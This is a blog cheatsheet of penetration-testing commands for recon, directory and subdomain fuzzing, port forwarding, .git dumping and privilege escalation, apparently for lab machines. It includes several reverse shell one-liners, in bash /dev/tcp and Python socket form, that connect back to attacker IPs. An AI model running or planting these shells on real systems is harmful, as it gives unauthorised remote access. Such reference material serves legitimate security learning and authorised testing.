Home Cheatsheet
Post
Cancel

Cheatsheet


Recon

Scan

Nmap

1
nmap -sV -sC --min-rate=1000 -p- <IP> -o nmap

Gobuster

1
2
3
4
Dirsearch
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u <IP/DNS>
Break status code
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u <IP/DNS> -b <BREAK_STATUSCODE>

ffuf

1
2
Subdomain search
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H “Host: FUZZ.site.com” -u http://site.com

fscan

Scan host in network Shadow1ng/fscan (github.com)

1
./fscan -h 172.0.0.1/24

Zeek with pcap

1
zeek -Cr 0.pcap

However password in zeek is to config for zeek to show in [Ippsec-Cap](https://www.youtube.com/watch?v=O_z6o2xuvlw)

SSH Port Forwarding

1
ssh -L <PORT IN LOCAL>:<IP>:<PORT IN SERVER> username@<IP SERVER>

Exploit

Bash reverse shell

1
bash -c 'bash -i >& /dev/tcp/10.10.14.14/9001 0>&1'

Python reverse shell

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.30",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Stable reverse shell

1
python3 -c 'import pty; pty.spawn("/bin/bash")'

GitHack - Exploit .git

lijiejie/GitHack: Khai thác tiết lộ thư mục .git (github.com)

1
2
Githack
python GitHack.py http://site.htb/.git/

Hash Identifier

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
hash-identifier  
┌──(kali㉿kali)-[~/TCM/TCM03_Academy]
└─$ hash-identifier            
/usr/share/hash-identifier/hash-id.py:13: SyntaxWarning: invalid escape sequence '\ '
  logo='''   #########################################################################
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH:

Privilege Escalation

Check sudo file permissions

1
sudo -l

Tools

  • linpeas
  • pspy - https://github.com/DominicBreuker/pspy - Show all process run in linux

Reverse shell

1
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Reverse Tools

C# and .NET

If you find my articles interesting, you can buy me a coffee

This post is licensed under CC BY 4.0 by the author.